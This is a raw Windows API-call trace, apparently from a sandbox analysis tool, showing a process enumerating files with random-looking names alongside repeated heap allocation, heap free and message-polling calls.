FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7b3530, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x28370490, ftLastAccessTime.dwHighDateTime=0x1d5dd89, ftLastWriteTime.dwLowDateTime=0x28370490, ftLastWriteTime.dwHighDateTime=0x1d5dd89, nFileSizeHigh=0x0, nFileSizeLow=0x13156, dwReserved0=0x10, dwReserved1=0x657690, cFileName="URxyJ_reG.mp3", cAlternateFileName="URXYJ_~1.MP3")) returned 1 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c20 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0073.433] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x696d08 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696d08 | out: hHeap=0x650000) returned 1 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0073.434] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.434] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x696d08 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0073.434] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696d08 | out: hHeap=0x650000) returned 1 [0073.434] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0073.434] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0073.434] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x6b99f8 [0073.434] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x696d08 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ce0 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0073.434] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cd0 [0073.434] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696d08 | out: hHeap=0x650000) returned 1 [0073.434] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0073.434] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b99f8 | out: hHeap=0x650000) returned 1 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0073.435] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0073.435] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.435] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0073.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0073.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.435] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x12c0069, ftCreationTime.dwLowDateTime=0xc27d9, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x118006a, nFileSizeHigh=0xc27d9, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="UR\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0073.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0073.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0073.435] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c20 [0073.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.436] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x696d08 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696d08 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b4c8 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b498 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0073.436] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0073.436] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.436] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.436] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0073.437] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b810 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b438 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dea0 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b420 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b480 | out: hHeap=0x650000) returned 1 [0073.437] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b468 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3d8 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3c0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3a8 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b408 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3f0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.438] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9970 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.439] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.439] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.439] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.439] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.439] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.439] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.439] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0073.439] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c50 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.439] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa07af50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x836c1090, ftLastAccessTime.dwHighDateTime=0x1d5e62a, ftLastWriteTime.dwLowDateTime=0x836c1090, ftLastWriteTime.dwHighDateTime=0x1d5e62a, nFileSizeHigh=0x0, nFileSizeLow=0xd79a, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="mKicOCoALM.flv", cAlternateFileName="MKICOC~1.FLV")) returned 1 [0073.439] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0073.439] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.439] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c50 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.439] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.439] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c50 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.440] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c50 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.440] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c50 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.440] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.440] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.441] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.441] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.441] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.441] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4ff6880, ftCreationTime.dwHighDateTime=0x1d5df51, ftLastAccessTime.dwLowDateTime=0x458ca660, ftLastAccessTime.dwHighDateTime=0x1d5dc69, ftLastWriteTime.dwLowDateTime=0x458ca660, ftLastWriteTime.dwHighDateTime=0x1d5dc69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="NA3pEcvaltBR8VLK", cAlternateFileName="NA3PEC~1")) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.441] 